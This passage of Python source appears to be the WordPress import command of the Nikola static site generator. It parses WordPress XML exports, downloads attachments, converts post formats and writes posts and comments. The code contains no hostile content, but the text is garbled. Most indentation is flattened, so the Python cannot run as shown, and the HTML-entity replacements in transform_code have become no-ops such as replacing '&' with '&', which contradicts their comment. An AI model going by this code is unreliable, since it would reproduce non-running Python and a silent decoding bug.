# Someone might have disabled the plugin in the `conf.py` used
site.plugin_manager.activatePluginByName(plugin_installer_info.name)
plugin_installer_info.plugin_object.set_site(site)
plugin_installer = plugin_installer_info.plugin_object
# Try to install the requested plugin
options = {}
for option in plugin_installer.cmd_options:
options[option['name']] = option['default']
options['install'] = plugin_name
options['output_dir'] = output_dir
options['show_install_notes'] = show_install_notes
if plugin_installer.execute(options=options) > 0:
return False
# Let the plugin manager find newly installed plugins
site.plugin_manager.collectPlugins()
# Re-scan for compiler extensions
site.compiler_extensions = site._activate_plugins_of_category("CompilerExtension")
return True
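# Usage sketch (illustrative): install the (GPL) WordPress page compiler into a
# site's local plugin directory, e.g.
#   install_plugin(site, 'wordpress_compiler', output_dir='plugins')
# which mirrors how the import command invokes it below.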
class CommandImportWordpress(Command, ImportMixin):
"""Import a WordPress dump."""
name = "import_wordpress"
needs_config = False
doc_usage = "[options] wordpress_export_file"
doc_purpose = "import a WordPress dump"
cmd_options = ImportMixin.cmd_options + [
{
'name': 'exclude_drafts',
'long': 'no-drafts',
'short': 'd',
'default': False,
'type': bool,
'help': "Don't import drafts",
},
{
'name': 'exclude_privates',
'long': 'exclude-privates',
'default': False,
'type': bool,
'help': "Don't import private posts",
},
{
'name': 'include_empty_items',
'long': 'include-empty-items',
'default': False,
'type': bool,
'help': "Include empty posts and pages",
},
{
'name': 'squash_newlines',
'long': 'squash-newlines',
'default': False,
'type': bool,
'help': "Shorten multiple newlines in a row to only two newlines",
},
{
'name': 'no_downloads',
'long': 'no-downloads',
'default': False,
'type': bool,
'help': "Do not try to download files for the import",
},
{
'name': 'download_auth',
'long': 'download-auth',
'default': None,
'type': str,
'help': "Specify username and password for HTTP authentication (separated by ':')",
},
{
'name': 'separate_qtranslate_content',
'long': 'qtranslate',
'default': False,
'type': bool,
'help': "Look for translations generated by qtranslate plugin",
# WARNING: won't recover translated titles that actually
# don't seem to be part of the wordpress XML export at the
# time of writing :(
},
{
'name': 'translations_pattern',
'long': 'translations_pattern',
'default': None,
'type': str,
'help': "The pattern for translation files names",
},
{
'name': 'export_categories_as_categories',
'long': 'export-categories-as-categories',
'default': False,
'type': bool,
'help': "Export categories as categories, instead of treating them as tags",
},
{
'name': 'export_comments',
'long': 'export-comments',
'default': False,
'type': bool,
'help': "Export comments as .wpcomment files",
},
{
'name': 'html2text',
'long': 'html2text',
'default': False,
'type': bool,
'help': "Uses html2text (needs to be installed with pip) to transform WordPress posts to MarkDown during import",
},
{
'name': 'transform_to_markdown',
'long': 'transform-to-markdown',
'default': False,
'type': bool,
'help': "Uses WordPress page compiler to transform WordPress posts to HTML and then use html2text to transform them to MarkDown during import",
},
{
'name': 'transform_to_html',
'long': 'transform-to-html',
'default': False,
'type': bool,
'help': "Uses WordPress page compiler to transform WordPress posts directly to HTML during import",
},
{
'name': 'use_wordpress_compiler',
'long': 'use-wordpress-compiler',
'default': False,
'type': bool,
'help': "Instead of converting posts to markdown, leave them as is and use the WordPress page compiler",
},
{
'name': 'install_wordpress_compiler',
'long': 'install-wordpress-compiler',
'default': False,
'type': bool,
'help': "Automatically installs the WordPress page compiler (either locally or in the new site) if required by other options.\nWarning: the compiler is GPL software!",
},
{
'name': 'tag_sanitizing_strategy',
'long': 'tag-sanitizing-strategy',
'default': 'first',
'help': 'lower: Convert all tag and category names to lower case\nfirst: Keep first spelling of tag or category name',
},
{
'name': 'one_file',
'long': 'one-file',
'default': False,
'type': bool,
'help': "Save imported posts in the more modern one-file format.",
},
]
all_tags = set([])
def _get_compiler(self):
"""Return whatever compiler we will use."""
self._find_wordpress_compiler()
if self.wordpress_page_compiler is not None:
return self.wordpress_page_compiler
plugin_info = self.site.plugin_manager.getPluginByName('markdown', 'PageCompiler')
if plugin_info is not None:
if not plugin_info.is_activated:
self.site.plugin_manager.activatePluginByName(plugin_info.name)
plugin_info.plugin_object.set_site(self.site)
return plugin_info.plugin_object
else:
LOGGER.error("Can't find markdown post compiler.")
def _find_wordpress_compiler(self):
"""Find WordPress compiler plugin."""
if self.wordpress_page_compiler is not None:
return
plugin_info = self.site.plugin_manager.getPluginByName('wordpress', 'PageCompiler')
if plugin_info is not None:
if not plugin_info.is_activated:
self.site.plugin_manager.activatePluginByName(plugin_info.name)
plugin_info.plugin_object.set_site(self.site)
self.wordpress_page_compiler = plugin_info.plugin_object
def _read_options(self, options, args):
"""Read command-line options."""
options['filename'] = args.pop(0)
if args and ('output_folder' not in args or
options['output_folder'] == 'new_site'):
options['output_folder'] = args.pop(0)
if args:
LOGGER.warn('You specified additional arguments ({0}). Please consider '
'putting these arguments before the filename if you '
'are running into problems.'.format(args))
self.onefile = options.get('one_file', False)
self.import_into_existing_site = False
self.url_map = {}
self.timezone = None
self.wordpress_export_file = options['filename']
self.squash_newlines = options.get('squash_newlines', False)
self.output_folder = options.get('output_folder', 'new_site')
self.exclude_drafts = options.get('exclude_drafts', False)
self.exclude_privates = options.get('exclude_privates', False)
self.no_downloads = options.get('no_downloads', False)
self.import_empty_items = options.get('include_empty_items', False)
self.export_categories_as_categories = options.get('export_categories_as_categories', False)
self.export_comments = options.get('export_comments', False)
self.html2text = options.get('html2text', False)
self.transform_to_markdown = options.get('transform_to_markdown', False)
self.transform_to_html = options.get('transform_to_html', False)
self.use_wordpress_compiler = options.get('use_wordpress_compiler', False)
self.install_wordpress_compiler = options.get('install_wordpress_compiler', False)
self.wordpress_page_compiler = None
        self.tag_saniziting_strategy = options.get('tag_sanitizing_strategy', 'first')  # key matches the 'tag_sanitizing_strategy' cmd option above
self.auth = None
if options.get('download_auth') is not None:
username_password = options.get('download_auth')
self.auth = tuple(username_password.split(':', 1))
if len(self.auth) < 2:
LOGGER.error("Please specify HTTP authentication credentials in the form username:password.")
return False
self.separate_qtranslate_content = options.get('separate_qtranslate_content')
self.translations_pattern = options.get('translations_pattern')
count = (1 if self.html2text else 0) + (1 if self.transform_to_html else 0) + (1 if self.transform_to_markdown else 0)
if count > 1:
LOGGER.error("You can use at most one of the options --html2text, --transform-to-html and --transform-to-markdown.")
return False
if (self.html2text or self.transform_to_html or self.transform_to_markdown) and self.use_wordpress_compiler:
LOGGER.warn("It does not make sense to combine --use-wordpress-compiler with any of --html2text, --transform-to-html and --transform-to-markdown, as the latter convert all posts to HTML and the first option then affects zero posts.")
if (self.html2text or self.transform_to_markdown) and not html2text:
LOGGER.error("You need to install html2text via 'pip install html2text' before you can use the --html2text and --transform-to-markdown options.")
return False
if self.transform_to_html or self.transform_to_markdown:
self._find_wordpress_compiler()
if not self.wordpress_page_compiler and self.install_wordpress_compiler:
if not install_plugin(self.site, 'wordpress_compiler', output_dir='plugins'): # local install
return False
self._find_wordpress_compiler()
if not self.wordpress_page_compiler:
LOGGER.error("To compile WordPress posts to HTML, the WordPress post compiler is needed. You can install it via:")
LOGGER.error(" nikola plugin -i wordpress_compiler")
LOGGER.error("Please note that the WordPress post compiler is licensed under the GPL v2.")
return False
return True
def _prepare(self, channel):
"""Prepare context and category hierarchy."""
self.context = self.populate_context(channel)
self.base_dir = urlparse(self.context['BASE_URL']).path
if self.export_categories_as_categories:
wordpress_namespace = channel.nsmap['wp']
cat_map = dict()
for cat in channel.findall('{{{0}}}category'.format(wordpress_namespace)):
# cat_id = get_text_tag(cat, '{{{0}}}term_id'.format(wordpress_namespace), None)
cat_slug = get_text_tag(cat, '{{{0}}}category_nicename'.format(wordpress_namespace), None)
cat_parent_slug = get_text_tag(cat, '{{{0}}}category_parent'.format(wordpress_namespace), None)
cat_name = get_text_tag(cat, '{{{0}}}cat_name'.format(wordpress_namespace), None)
cat_path = [cat_name]
if cat_parent_slug in cat_map:
cat_path = cat_map[cat_parent_slug] + cat_path
cat_map[cat_slug] = cat_path
self._category_paths = dict()
for cat, path in cat_map.items():
self._category_paths[cat] = utils.join_hierarchical_category_path(path)
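    # Illustrative example (assumed data): for a category "Python" whose
    # category_parent slug is "tech" with name "Tech", cat_map ends up as
    #   {'tech': ['Tech'], 'python': ['Tech', 'Python']}
    # and _category_paths['python'] is the joined hierarchical path, e.g.
    # "Tech/Python" (exact separator/escaping per utils.join_hierarchical_category_path).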
def _execute(self, options={}, args=[]):
"""Import a WordPress blog from an export file into a Nikola site."""
if not args:
print(self.help())
return False
if not self._read_options(options, args):
return False
# A place holder where extra language (if detected) will be stored
self.extra_languages = set()
if not self.no_downloads:
            def show_info_about_missing_module(modulename):
LOGGER.error(
'To use the "{commandname}" command, you have to install '
'the "{package}" package or supply the "--no-downloads" '
'option.'.format(
commandname=self.name,
package=modulename)
)
if phpserialize is None:
req_missing(['phpserialize'], 'import WordPress dumps without --no-downloads')
channel = self.get_channel_from_file(self.wordpress_export_file)
self._prepare(channel)
conf_template = self.generate_base_site()
# If user has specified a custom pattern for translation files we
# need to fix the config
if self.translations_pattern:
self.context['TRANSLATIONS_PATTERN'] = self.translations_pattern
self.import_posts(channel)
self.context['TRANSLATIONS'] = format_default_translations_config(
self.extra_languages)
self.context['REDIRECTIONS'] = self.configure_redirections(
self.url_map, self.base_dir)
if self.timezone:
self.context['TIMEZONE'] = self.timezone
if self.export_categories_as_categories:
self.context['CATEGORY_ALLOW_HIERARCHIES'] = True
self.context['CATEGORY_OUTPUT_FLAT_HIERARCHY'] = True
# Add tag redirects
for tag in self.all_tags:
try:
if isinstance(tag, utils.bytes_str):
tag_str = tag.decode('utf8', 'replace')
else:
tag_str = tag
except AttributeError:
tag_str = tag
tag = utils.slugify(tag_str, self.lang)
src_url = '{}tag/{}'.format(self.context['SITE_URL'], tag)
dst_url = self.site.link('tag', tag)
if src_url != dst_url:
self.url_map[src_url] = dst_url
self.write_urlmap_csv(
os.path.join(self.output_folder, 'url_map.csv'), self.url_map)
rendered_template = conf_template.render(**prepare_config(self.context))
self.write_configuration(self.get_configuration_output_path(),
rendered_template)
if self.use_wordpress_compiler:
if self.install_wordpress_compiler:
if not install_plugin(self.site, 'wordpress_compiler', output_dir=os.path.join(self.output_folder, 'plugins')):
return False
else:
LOGGER.warn("Make sure to install the WordPress page compiler via")
LOGGER.warn(" nikola plugin -i wordpress_compiler")
LOGGER.warn("in your imported blog's folder ({0}), if you haven't installed it system-wide or user-wide. Otherwise, your newly imported blog won't compile.".format(self.output_folder))
@classmethod
def read_xml_file(cls, filename):
"""Read XML file into memory."""
xml = []
with open(filename, 'rb') as fd:
for line in fd:
# These explode etree and are useless
if b'<atom:link rel=' in line:
continue
xml.append(line)
return b''.join(xml)
@classmethod
def get_channel_from_file(cls, filename):
"""Get channel from XML file."""
tree = etree.fromstring(cls.read_xml_file(filename))
channel = tree.find('channel')
return channel
def populate_context(self, channel):
"""Populate context with config for the site."""
wordpress_namespace = channel.nsmap['wp']
context = SAMPLE_CONF.copy()
self.lang = get_text_tag(channel, 'language', 'en')[:2]
context['DEFAULT_LANG'] = self.lang
context['TRANSLATIONS_PATTERN'] = DEFAULT_TRANSLATIONS_PATTERN
context['BLOG_TITLE'] = get_text_tag(channel, 'title',
'PUT TITLE HERE')
context['BLOG_DESCRIPTION'] = get_text_tag(
channel, 'description', 'PUT DESCRIPTION HERE')
context['BASE_URL'] = get_text_tag(channel, 'link', '#')
if not context['BASE_URL']:
base_site_url = channel.find('{{{0}}}author'.format(wordpress_namespace))
context['BASE_URL'] = get_text_tag(base_site_url,
None,
"http://foo.com/")
if not context['BASE_URL'].endswith('/'):
context['BASE_URL'] += '/'
context['SITE_URL'] = context['BASE_URL']
author = channel.find('{{{0}}}author'.format(wordpress_namespace))
context['BLOG_EMAIL'] = get_text_tag(
author,
'{{{0}}}author_email'.format(wordpress_namespace),
"[email protected]")
context['BLOG_AUTHOR'] = get_text_tag(
author,
'{{{0}}}author_display_name'.format(wordpress_namespace),
"Joe Example")
extensions = ['rst', 'txt', 'md', 'html']
if self.use_wordpress_compiler:
extensions.append('wp')
POSTS = '(\n'
PAGES = '(\n'
for extension in extensions:
POSTS += ' ("posts/*.{0}", "posts", "post.tmpl"),\n'.format(extension)
PAGES += ' ("stories/*.{0}", "stories", "story.tmpl"),\n'.format(extension)
POSTS += ')\n'
PAGES += ')\n'
context['POSTS'] = POSTS
context['PAGES'] = PAGES
COMPILERS = '{\n'
COMPILERS += ''' "rest": ('.txt', '.rst'),''' + '\n'
COMPILERS += ''' "markdown": ('.md', '.mdown', '.markdown'),''' + '\n'
COMPILERS += ''' "html": ('.html', '.htm'),''' + '\n'
if self.use_wordpress_compiler:
COMPILERS += ''' "wordpress": ('.wp'),''' + '\n'
COMPILERS += '}'
context['COMPILERS'] = COMPILERS
return context
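    # For reference, with the default extensions the generated POSTS value reads
    # (sketch):
    #   (
    #       ("posts/*.rst", "posts", "post.tmpl"),
    #       ("posts/*.txt", "posts", "post.tmpl"),
    #       ("posts/*.md", "posts", "post.tmpl"),
    #       ("posts/*.html", "posts", "post.tmpl"),
    #   )
    # plus a "posts/*.wp" line when the WordPress compiler is enabled.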
def download_url_content_to_file(self, url, dst_path):
"""Download some content (attachments) to a file."""
try:
request = requests.get(url, auth=self.auth)
if request.status_code >= 400:
LOGGER.warn("Downloading {0} to {1} failed with HTTP status code {2}".format(url, dst_path, request.status_code))
return
with open(dst_path, 'wb+') as fd:
fd.write(request.content)
except requests.exceptions.ConnectionError as err:
LOGGER.warn("Downloading {0} to {1} failed: {2}".format(url, dst_path, err))
def import_attachment(self, item, wordpress_namespace):
"""Import an attachment to the site."""
# Download main image
url = get_text_tag(
item, '{{{0}}}attachment_url'.format(wordpress_namespace), 'foo')
link = get_text_tag(item, '{{{0}}}link'.format(wordpress_namespace),
'foo')
path = urlparse(url).path
dst_path = os.path.join(*([self.output_folder, 'files'] + list(path.split('/'))))
if self.no_downloads:
LOGGER.info("Skipping downloading {0} => {1}".format(url, dst_path))
else:
dst_dir = os.path.dirname(dst_path)
utils.makedirs(dst_dir)
LOGGER.info("Downloading {0} => {1}".format(url, dst_path))
self.download_url_content_to_file(url, dst_path)
dst_url = '/'.join(dst_path.split(os.sep)[2:])
links[link] = '/' + dst_url
links[url] = '/' + dst_url
files = [path]
files_meta = [{}]
additional_metadata = item.findall('{{{0}}}postmeta'.format(wordpress_namespace))
if phpserialize and additional_metadata:
source_path = os.path.dirname(url)
for element in additional_metadata:
meta_key = element.find('{{{0}}}meta_key'.format(wordpress_namespace))
if meta_key is not None and meta_key.text == '_wp_attachment_metadata':
meta_value = element.find('{{{0}}}meta_value'.format(wordpress_namespace))
if meta_value is None:
continue
                    # Someone from WordPress thought it was a good idea to
                    # serialize PHP objects into that metadata field. Given
                    # that the export should give you the power to move your
                    # blog into another site or system, it's not. Why don't
                    # they just use JSON?
if sys.version_info[0] == 2:
try:
metadata = phpserialize.loads(utils.sys_encode(meta_value.text))
except ValueError:
# local encoding might be wrong sometimes
metadata = phpserialize.loads(meta_value.text.encode('utf-8'))
else:
metadata = phpserialize.loads(meta_value.text.encode('utf-8'))
meta_key = b'image_meta'
size_key = b'sizes'
file_key = b'file'
width_key = b'width'
height_key = b'height'
# Extract metadata
if width_key in metadata and height_key in metadata:
files_meta[0]['width'] = int(metadata[width_key])
files_meta[0]['height'] = int(metadata[height_key])
if meta_key in metadata:
image_meta = metadata[meta_key]
if not image_meta:
continue
dst_meta = {}
def add(our_key, wp_key, is_int=False, ignore_zero=False, is_float=False):
if wp_key in image_meta:
value = image_meta[wp_key]
if is_int:
value = int(value)
if ignore_zero and value == 0:
return
elif is_float:
value = float(value)
if ignore_zero and value == 0:
return
else:
value = value.decode('utf-8') # assume UTF-8
if value == '': # skip empty values
return
dst_meta[our_key] = value
add('aperture', b'aperture', is_float=True, ignore_zero=True)
add('credit', b'credit')
add('camera', b'camera')
add('caption', b'caption')
add('created_timestamp', b'created_timestamp', is_float=True, ignore_zero=True)
add('copyright', b'copyright')
add('focal_length', b'focal_length', is_float=True, ignore_zero=True)
add('iso', b'iso', is_float=True, ignore_zero=True)
add('shutter_speed', b'shutter_speed', ignore_zero=True, is_float=True)
add('title', b'title')
if len(dst_meta) > 0:
files_meta[0]['meta'] = dst_meta
# Find other sizes of image
if size_key not in metadata:
continue
for size in metadata[size_key]:
filename = metadata[size_key][size][file_key]
url = '/'.join([source_path, filename.decode('utf-8')])
# Construct metadata
meta = {}
meta['size'] = size.decode('utf-8')
if width_key in metadata[size_key][size] and height_key in metadata[size_key][size]:
meta['width'] = int(metadata[size_key][size][width_key])
meta['height'] = int(metadata[size_key][size][height_key])
path = urlparse(url).path
dst_path = os.path.join(*([self.output_folder, 'files'] + list(path.split('/'))))
if self.no_downloads:
LOGGER.info("Skipping downloading {0} => {1}".format(url, dst_path))
else:
dst_dir = os.path.dirname(dst_path)
utils.makedirs(dst_dir)
LOGGER.info("Downloading {0} => {1}".format(url, dst_path))
self.download_url_content_to_file(url, dst_path)
dst_url = '/'.join(dst_path.split(os.sep)[2:])
links[url] = '/' + dst_url
files.append(path)
files_meta.append(meta)
# Prepare result
result = {}
result['files'] = files
result['files_meta'] = files_meta
# Prepare extraction of more information
dc_namespace = item.nsmap['dc']
content_namespace = item.nsmap['content']
excerpt_namespace = item.nsmap['excerpt']
def add(result_key, key, namespace=None, filter=None, store_empty=False):
if namespace is not None:
value = get_text_tag(item, '{{{0}}}{1}'.format(namespace, key), None)
else:
value = get_text_tag(item, key, None)
if value is not None:
if filter:
value = filter(value)
if value or store_empty:
result[result_key] = value
add('title', 'title')
add('date_utc', 'post_date_gmt', namespace=wordpress_namespace)
add('wordpress_user_name', 'creator', namespace=dc_namespace)
add('content', 'encoded', namespace=content_namespace)
add('excerpt', 'encoded', namespace=excerpt_namespace)
add('description', 'description')
return result
code_re1 = re.compile(r'\[code.* lang.*?="(.*?)?".*\](.*?)\[/code\]', re.DOTALL | re.MULTILINE)
code_re2 = re.compile(r'\[sourcecode.* lang.*?="(.*?)?".*\](.*?)\[/sourcecode\]', re.DOTALL | re.MULTILINE)
code_re3 = re.compile(r'\[code.*?\](.*?)\[/code\]', re.DOTALL | re.MULTILINE)
code_re4 = re.compile(r'\[sourcecode.*?\](.*?)\[/sourcecode\]', re.DOTALL | re.MULTILINE)
def transform_code(self, content):
"""Transform code blocks."""
# https://en.support.wordpress.com/code/posting-source-code/. There are
# a ton of things not supported here. We only do a basic [code
# lang="x"] -> ```x translation, and remove quoted html entities (<,
# >, &, and ").
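        # Illustrative example (assumed input): the shortcode
        #   [code lang="python"]x < 1[/code]
        # becomes
        #   ```python
        #   x < 1
        #   ```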
def replacement(m, c=content):
if len(m.groups()) == 1:
language = ''
code = m.group(0)
else:
language = m.group(1) or ''
code = m.group(2)
code = code.replace('&', '&')
code = code.replace('>', '>')
code = code.replace('<', '<')
code = code.replace('"', '"')
return '```{language}\n{code}\n```'.format(language=language, code=code)
content = self.code_re1.sub(replacement, content)
content = self.code_re2.sub(replacement, content)
content = self.code_re3.sub(replacement, content)
content = self.code_re4.sub(replacement, content)
return content
@staticmethod
def transform_caption(content, use_html=False):
"""Transform captions."""
new_caption = re.sub(r'\[/caption\]', '</h1>' if use_html else '', content)
new_caption = re.sub(r'\[caption.*\]', '<h1>' if use_html else '', new_caption)
return new_caption
def transform_multiple_newlines(self, content):
"""Replace multiple newlines with only two."""
if self.squash_newlines:
return re.sub(r'\n{3,}', r'\n\n', content)
else:
return content
def transform_content(self, content, post_format, attachments):
"""Transform content into appropriate format."""
if post_format == 'wp':
if self.transform_to_html:
additional_data = {}
if attachments is not None:
additional_data['attachments'] = attachments
try:
content = self.wordpress_page_compiler.compile_to_string(content, additional_data=additional_data)
except TypeError: # old versions of the plugin don't support the additional argument
content = self.wordpress_page_compiler.compile_to_string(content)
return content, 'html', True
elif self.transform_to_markdown:
# First convert to HTML with WordPress plugin
additional_data = {}
if attachments is not None:
additional_data['attachments'] = attachments
try:
content = self.wordpress_page_compiler.compile_to_string(content, additional_data=additional_data)
except TypeError: # old versions of the plugin don't support the additional argument
content = self.wordpress_page_compiler.compile_to_string(content)
# Now convert to MarkDown with html2text
h = html2text.HTML2Text()
content = h.handle(content)
return content, 'md', False
elif self.html2text:
# TODO: what to do with [code] blocks?
# content = self.transform_code(content)
content = self.transform_caption(content, use_html=True)
h = html2text.HTML2Text()
content = h.handle(content)
return content, 'md', False
elif self.use_wordpress_compiler:
return content, 'wp', False
else:
content = self.transform_code(content)
content = self.transform_caption(content)
content = self.transform_multiple_newlines(content)
return content, 'md', True
elif post_format == 'markdown':
return content, 'md', True
elif post_format == 'none':
return content, 'html', True
else:
return None
def _extract_comment(self, comment, wordpress_namespace):
"""Extract comment from dump."""
id = int(get_text_tag(comment, "{{{0}}}comment_id".format(wordpress_namespace), None))
author = get_text_tag(comment, "{{{0}}}comment_author".format(wordpress_namespace), None)
author_email = get_text_tag(comment, "{{{0}}}comment_author_email".format(wordpress_namespace), None)
author_url = get_text_tag(comment, "{{{0}}}comment_author_url".format(wordpress_namespace), None)
author_IP = get_text_tag(comment, "{{{0}}}comment_author_IP".format(wordpress_namespace), None)
# date = get_text_tag(comment, "{{{0}}}comment_date".format(wordpress_namespace), None)
date_gmt = get_text_tag(comment, "{{{0}}}comment_date_gmt".format(wordpress_namespace), None)
content = get_text_tag(comment, "{{{0}}}comment_content".format(wordpress_namespace), None)
approved = get_text_tag(comment, "{{{0}}}comment_approved".format(wordpress_namespace), '0')
if approved == '0':
approved = 'hold'
elif approved == '1':
approved = 'approved'
elif approved == 'spam' or approved == 'trash':
pass
else:
LOGGER.warn("Unknown comment approved status: {0}".format(approved))
parent = int(get_text_tag(comment, "{{{0}}}comment_parent".format(wordpress_namespace), 0))
if parent == 0:
parent = None
user_id = int(get_text_tag(comment, "{{{0}}}comment_user_id".format(wordpress_namespace), 0))
if user_id == 0:
user_id = None
if approved == 'trash' or approved == 'spam':
return None
return {"id": id, "status": str(approved), "approved": approved == "approved",
"author": author, "email": author_email, "url": author_url, "ip": author_IP,
"date": date_gmt, "content": content, "parent": parent, "user_id": user_id}
def _write_comment(self, filename, comment):
"""Write comment to file."""
def write_header_line(fd, header_field, header_content):
"""Write comment header line."""
if header_content is None:
return
header_content = unicode_str(header_content).replace('\n', ' ')
line = '.. ' + header_field + ': ' + header_content + '\n'
fd.write(line.encode('utf8'))
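        # e.g. write_header_line(fd, "author", "Jane Doe") emits the bytes
        # b'.. author: Jane Doe\n'; newlines inside values become spaces.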
with open(filename, "wb+") as fd:
write_header_line(fd, "id", comment["id"])
write_header_line(fd, "status", comment["status"])
write_header_line(fd, "approved", comment["approved"])
write_header_line(fd, "author", comment["author"])
write_header_line(fd, "author_email", comment["email"])
write_header_line(fd, "author_url", comment["url"])
write_header_line(fd, "author_IP", comment["ip"])
write_header_line(fd, "date_utc", comment["date"])
write_header_line(fd, "parent_id", comment["parent"])
write_header_line(fd, "wordpress_user_id", comment["user_id"])
fd.write(('\n' + comment['content']).encode('utf8'))
def _create_metadata(self, status, excerpt, tags, categories, post_name=None):
"""Create post metadata."""
other_meta = {'wp-status': status}
if excerpt is not None:
other_meta['excerpt'] = excerpt
if self.export_categories_as_categories:
cats = []
for text in categories:
if text in self._category_paths:
cats.append(self._category_paths[text])
else:
cats.append(utils.join_hierarchical_category_path([text]))
other_meta['categories'] = ','.join(cats)
if len(cats) > 0:
other_meta['category'] = cats[0]
if len(cats) > 1:
LOGGER.warn(('Post "{0}" has more than one category! ' +
'Will only use the first one.').format(post_name))
tags_cats = tags
else:
tags_cats = tags + categories
return tags_cats, other_meta
_tag_sanitize_map = {True: {}, False: {}}
def _sanitize(self, tag, is_category):
if self.tag_saniziting_strategy == 'lower':
return tag.lower()
if tag.lower() not in self._tag_sanitize_map[is_category]:
self._tag_sanitize_map[is_category][tag.lower()] = [tag]
return tag
previous = self._tag_sanitize_map[is_category][tag.lower()]
if self.tag_saniziting_strategy == 'first':
if tag != previous[0]:
LOGGER.warn("Changing spelling of {0} name '{1}' to {2}.".format('category' if is_category else 'tag', tag, previous[0]))
return previous[0]
else:
LOGGER.error("Unknown tag sanitizing strategy '{0}'!".format(self.tag_saniziting_strategy))
sys.exit(1)
return tag
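    # Illustrative behaviour (assumed tags): with tag_saniziting_strategy
    # 'first', seeing 'Linux' and later 'LINUX' maps both to 'Linux' (with a
    # warning); with 'lower' both simply become 'linux'.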
def import_postpage_item(self, item, wordpress_namespace, out_folder=None, attachments=None):
"""Take an item from the feed and creates a post file."""
if out_folder is None:
out_folder = 'posts'
title = get_text_tag(item, 'title', 'NO TITLE')
# titles can have line breaks in them, particularly when they are
# created by third-party tools that post to Wordpress.
# Handle windows-style and unix-style line endings.
title = title.replace('\r\n', ' ').replace('\n', ' ')
# link is something like http://foo.com/2012/09/01/hello-world/
# So, take the path, utils.slugify it, and that's our slug
link = get_text_tag(item, 'link', None)
parsed = urlparse(link)
path = unquote(parsed.path.strip('/'))
        try:
            if isinstance(path, utils.bytes_str):
                path = path.decode('utf8', 'replace')
        except AttributeError:
            pass
# Cut out the base directory.
if path.startswith(self.base_dir.strip('/')):
path = path.replace(self.base_dir.strip('/'), '', 1)
pathlist = path.split('/')
if parsed.query: # if there are no nice URLs and query strings are used
out_folder = os.path.join(*([out_folder] + pathlist))
slug = get_text_tag(
item, '{{{0}}}post_name'.format(wordpress_namespace), None)
if not slug: # it *may* happen
slug = get_text_tag(
item, '{{{0}}}post_id'.format(wordpress_namespace), None)
if not slug: # should never happen
LOGGER.error("Error converting post:", title)
return False
else:
if len(pathlist) > 1:
out_folder = os.path.join(*([out_folder] + pathlist[:-1]))
slug = utils.slugify(pathlist[-1], self.lang)
description = get_text_tag(item, 'description', '')
post_date = get_text_tag(
item, '{{{0}}}post_date'.format(wordpress_namespace), None)
try:
dt = utils.to_datetime(post_date)
except ValueError:
dt = datetime.datetime(1970, 1, 1, 0, 0, 0)
LOGGER.error('Malformed date "{0}" in "{1}" [{2}], assuming 1970-01-01 00:00:00 instead.'.format(post_date, title, slug))
post_date = dt.strftime('%Y-%m-%d %H:%M:%S')
if dt.tzinfo and self.timezone is None:
self.timezone = utils.get_tzname(dt)
status = get_text_tag(
item, '{{{0}}}status'.format(wordpress_namespace), 'publish')
content = get_text_tag(
item, '{http://purl.org/rss/1.0/modules/content/}encoded', '')
excerpt = get_text_tag(
item, '{http://wordpress.org/export/1.2/excerpt/}encoded', None)
if excerpt is not None:
if len(excerpt) == 0:
excerpt = None
tags = []
categories = []
if status == 'trash':
LOGGER.warn('Trashed post "{0}" will not be imported.'.format(title))
return False
elif status == 'private':
tags.append('private')
is_draft = False
is_private = True
elif status != 'publish':
tags.append('draft')
is_draft = True
is_private = False
else:
is_draft = False
is_private = False
for tag in item.findall('category'):
text = tag.text
type = 'category'
if 'domain' in tag.attrib:
type = tag.attrib['domain']
if text == 'Uncategorized' and type == 'category':
continue
if type == 'category':
categories.append(text)
else:
tags.append(text)
if '$latex' in content:
tags.append('mathjax')
for i, cat in enumerate(categories[:]):
cat = self._sanitize(cat, True)
categories[i] = cat
self.all_tags.add(cat)
for i, tag in enumerate(tags[:]):
tag = self._sanitize(tag, False)
tags[i] = tag
self.all_tags.add(tag)
# Find post format if it's there
post_format = 'wp'
format_tag = [x for x in item.findall('*//{%s}meta_key' % wordpress_namespace) if x.text == '_tc_post_format']
if format_tag:
post_format = format_tag[0].getparent().find('{%s}meta_value' % wordpress_namespace).text
if post_format == 'wpautop':
post_format = 'wp'
if is_draft and self.exclude_drafts:
LOGGER.notice('Draft "{0}" will not be imported.'.format(title))
return False
elif is_private and self.exclude_privates:
LOGGER.notice('Private post "{0}" will not be imported.'.format(title))
return False
elif content.strip() or self.import_empty_items:
# If no content is found, no files are written.
self.url_map[link] = (self.context['SITE_URL'] +
out_folder.rstrip('/') + '/' + slug +
'.html').replace(os.sep, '/')
if hasattr(self, "separate_qtranslate_content") \
and self.separate_qtranslate_content:
content_translations = separate_qtranslate_content(content)
else:
content_translations = {"": content}
default_language = self.context["DEFAULT_LANG"]
for lang, content in content_translations.items():
try:
content, extension, rewrite_html = self.transform_content(content, post_format, attachments)
except:
LOGGER.error(('Cannot interpret post "{0}" (language {1}) with post ' +
'format {2}!').format(os.path.join(out_folder, slug), lang, post_format))
return False
if lang:
out_meta_filename = slug + '.meta'
if lang == default_language:
out_content_filename = slug + '.' + extension
else:
out_content_filename \
= utils.get_translation_candidate(self.context,
slug + "." + extension, lang)
self.extra_languages.add(lang)
meta_slug = slug
else:
out_meta_filename = slug + '.meta'
out_content_filename = slug + '.' + extension
meta_slug = slug
tags, other_meta = self._create_metadata(status, excerpt, tags, categories,
post_name=os.path.join(out_folder, slug))
meta = {
"title": title,
"slug": meta_slug,
"date": post_date,
"description": description,
"tags": ','.join(tags),
}
meta.update(other_meta)
if self.onefile:
self.write_post(
os.path.join(self.output_folder,
out_folder, out_content_filename),
content,
meta,
self._get_compiler(),
rewrite_html)
else:
self.write_metadata(os.path.join(self.output_folder, out_folder,
out_meta_filename),
title, meta_slug, post_date, description, tags, **other_meta)
self.write_content(
os.path.join(self.output_folder,
out_folder, out_content_filename),
content,
rewrite_html)
if self.export_comments:
comments = []
for tag in item.findall('{{{0}}}comment'.format(wordpress_namespace)):
comment = self._extract_comment(tag, wordpress_namespace)
if comment is not None:
comments.append(comment)
for comment in comments:
comment_filename = "{0}.{1}.wpcomment".format(slug, comment['id'])
self._write_comment(os.path.join(self.output_folder, out_folder, comment_filename), comment)
return (out_folder, slug)
else:
LOGGER.warn(('Not going to import "{0}" because it seems to contain'
' no content.').format(title))
return False
def _extract_item_info(self, item):
"""Extract information about an item."""
# The namespace usually is something like:
# http://wordpress.org/export/1.2/
wordpress_namespace = item.nsmap['wp']
post_type = get_text_tag(
item, '{{{0}}}post_type'.format(wordpress_namespace), 'post')
post_id = int(get_text_tag(
item, '{{{0}}}post_id'.format(wordpress_namespace), "0"))
parent_id = get_text_tag(
item, '{{{0}}}post_parent'.format(wordpress_namespace), None)
